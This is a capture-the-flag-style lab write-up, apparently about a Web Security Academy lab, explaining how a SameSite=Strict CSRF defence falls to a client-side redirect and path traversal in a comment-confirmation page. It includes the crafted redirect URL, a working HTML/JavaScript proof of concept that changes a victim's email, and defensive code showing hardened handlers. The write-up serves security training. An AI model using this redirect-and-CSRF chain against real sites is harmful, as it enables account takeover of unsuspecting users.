In my last write-up, I covered a lab similar to this one, but I also explained some fundamental concepts there, so feel free to check that out first.

Anyway, let's start this lab. First, I tried to change the email address and captured the request to analyze it. I noticed that the request doesn't have any CSRF token — it only has session cookies with the HttpOnly flag, and the SameSite attribute is set to Strict.


Alright, so I knew I couldn't use the top-level navigation trick I used in my last lab, because back then the SameSite attribute was set to Lax. This time it's different.

I changed the email address again and captured the request. Nothing unusual so far. Then I wanted to check whether changing the request method to GET would still work.


And it did.

Now I had no idea what to do next, so I checked the solution. What was my mistake? I didn't go through the entire application before looking at the solution.

Anyway, here's the key: there's a comment functionality on each post. When you post a comment, something interesting happens.


As you can see, after posting the comment, the page redirects to another page for a few seconds and then back to the previous page.

It redirects to a confirmation page with a postId parameter. I tried changing it and found that I could control it.

So I tested whether I could redirect to my account page from here:

/post/comment/confirmation?postId=/my-account

It worked — but as I mentioned, after a few seconds it tries to take you back to the previous directory. Since there's no directory like post/my-account, I had to use a path traversal trick:

/post/comment/confirmation?postId=../my-account

Next, I tried to change the email like this:

/post/comment/confirmation?postId=/my-account/change-email?email=pavan%40gmail.com&submit=1

But I got an error: missing parameter submit.

That's because the & wasn't encoded. So I encoded it as %26:

/post/comment/confirmation?postId=/my-account/change-email?email=pavan%40gmail.com%26submit=1

That worked perfectly.
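To make the two steps above concrete, here is an added example (my own, not code from the write-up or from the lab) that models the confirmation page's client-side redirect the way the write-up describes it and shows why the & had to become %26. The redirect logic is an assumption about how the lab page behaves, not its real source, and the origin https://lab.example is a placeholder. The hardened variant at the end shows the check a developer would add so that postId can no longer carry a path or a query string.

```javascript
// Added example, not code from the original write-up or from the lab itself.
// It models the confirmation page's client-side redirect as the write-up
// describes it (an assumption about the lab's behaviour, not its real source)
// and shows why the payload needed the & encoded as %26.

// Placeholder origin; the real lab hostname is not used here.
const ORIGIN = "https://lab.example";

// Pull the postId parameter out of a confirmation URL exactly as the browser's
// URLSearchParams would: percent-escapes are decoded, and a bare & starts a
// new top-level parameter.
function extractPostId(confirmationUrl) {
  return new URL(confirmationUrl, ORIGIN).searchParams.get("postId");
}

// Same lookup for any other parameter, used to show where an unencoded
// "&submit=1" actually ends up (outside postId).
function extractParam(confirmationUrl, name) {
  return new URL(confirmationUrl, ORIGIN).searchParams.get(name);
}

// Assumed vulnerable redirect: the page concatenates the raw postId under
// /post/ and navigates there. URL resolution collapses "../", so a traversal
// value lands on any same-site path, query string included.
function vulnerableRedirectTarget(postId) {
  return new URL("/post/" + postId, ORIGIN).href;
}

// Hardened redirect: accept only a numeric post id; anything else falls back
// to the blog index. With this check postId can no longer smuggle a path.
function safeRedirectTarget(postId) {
  if (typeof postId !== "string" || !/^\d{1,10}$/.test(postId)) {
    return new URL("/", ORIGIN).href;
  }
  return new URL("/post/" + postId, ORIGIN).href;
}

// Constructed inputs matching the two forms tried in the write-up.
const UNENCODED =
  ORIGIN + "/post/comment/confirmation?postId=/my-account/change-email?email=pavan%40gmail.com&submit=1";
const ENCODED =
  ORIGIN + "/post/comment/confirmation?postId=../my-account/change-email?email=pavan%40gmail.com%26submit=1";

console.log("unencoded postId :", extractPostId(UNENCODED));
console.log("unencoded submit :", extractParam(UNENCODED, "submit"));
console.log("encoded postId   :", extractPostId(ENCODED));
console.log("vulnerable target:", vulnerableRedirectTarget(extractPostId(ENCODED)));
console.log("hardened target  :", safeRedirectTarget(extractPostId(ENCODED)));
```

With the unencoded form, submit is parsed as a separate top-level parameter of the confirmation URL, so the value forwarded as postId ends at the email and the change-email endpoint reports it missing. With %26 the whole string survives inside postId, and the assumed redirect resolves /post/../my-account/change-email to the account endpoint with both parameters intact. The numeric check removes that possibility entirely.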

Now it was time to write the PoC (Proof of Concept):

<!DOCTYPE html>
<html lang="en">
<body>
  <h1>Form CSRF PoC</h1>
  <!-- The form alone would not work: a cross-site GET submission is a top-level
       navigation and the SameSite=Strict session cookie is not sent with it. -->
  <form method="GET" action="https://0ab300aa04ac3c1f80c817a9004000cc.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="pawned12@gmail.com">
    <input type="hidden" name="submit" value="1">
    <input type="submit" value="Submit Request">
  </form>
  <script>
    // Navigate the victim to the same-site confirmation page; its own client-side
    // redirect then follows postId to change-email, so that second request is
    // same-site and carries the session cookie.
    document.location = "https://0ab300aa04ac3c1f80c817a9004000cc.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email?email=pavan456%40gmail.com%26submit=1";
  </script>
</body>
</html>

I delivered it to the victim, and just like that — I bypassed the SameSite=Strict restriction using a client-side redirect. The lab was solved.
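The redirect only mattered because the change-email endpoint itself accepted a GET with no token. As an added example (mine, not the lab's code), here is a minimal model of that endpoint with the two properties the bypass relied on, beside a hardened handler that removes them. Request and session objects are constructed plain objects rather than real HTTP requests, and the handler shapes are assumptions for illustration.

```javascript
// Added example, not the lab's code: a model of the change-email endpoint.
// Requests and sessions are constructed plain objects, not real HTTP traffic.

// Assumed vulnerable behaviour, as the write-up observed: GET is accepted,
// there is no CSRF token, so any same-site navigation can change the email.
function vulnerableChangeEmail(req, session) {
  const query = req.query || {};
  if (!query.email) return { status: 400, body: "Missing parameter email" };
  if (query.submit !== "1") return { status: 400, body: "Missing parameter submit" };
  session.email = query.email;
  return { status: 302, body: "Email changed" };
}

// Constant-time string comparison so token checks do not leak via timing.
function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string") return false;
  let diff = a.length ^ b.length;
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    diff |= (a.charCodeAt(i) || 0) ^ (b.charCodeAt(i) || 0);
  }
  return diff === 0;
}

// Hardened handler: state changes only on POST, and the form must carry a
// token bound to the session. SameSite=Strict stays as defence in depth, but
// a same-site redirect can no longer reach this code path with a bare GET.
function safeChangeEmail(req, session) {
  if (req.method !== "POST") return { status: 405, body: "Method not allowed" };
  const body = req.body || {};
  if (!constantTimeEqual(body.csrf, session.csrf)) {
    return { status: 403, body: "Invalid CSRF token" };
  }
  if (!body.email) return { status: 400, body: "Missing parameter email" };
  session.email = body.email;
  return { status: 302, body: "Email changed" };
}

// Constructed session and the GET that a client-side redirect would produce.
const demoSession = { email: "wiener@example", csrf: "constructed-token" };
const redirectGet = { method: "GET", query: { email: "other@example", submit: "1" } };

console.log("vulnerable:", vulnerableChangeEmail(redirectGet, { ...demoSession }));
console.log("hardened  :", safeChangeEmail(redirectGet, { ...demoSession }));
```

The hardened handler answers the redirect-driven GET with 405 before touching the session, and a POST without the session's token with 403; only a POST carrying the matching token changes the email.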


Alright, that's it for today. I'll meet you in the next write-up. Till then, good night — because I'm really tired.

Thanks for reading!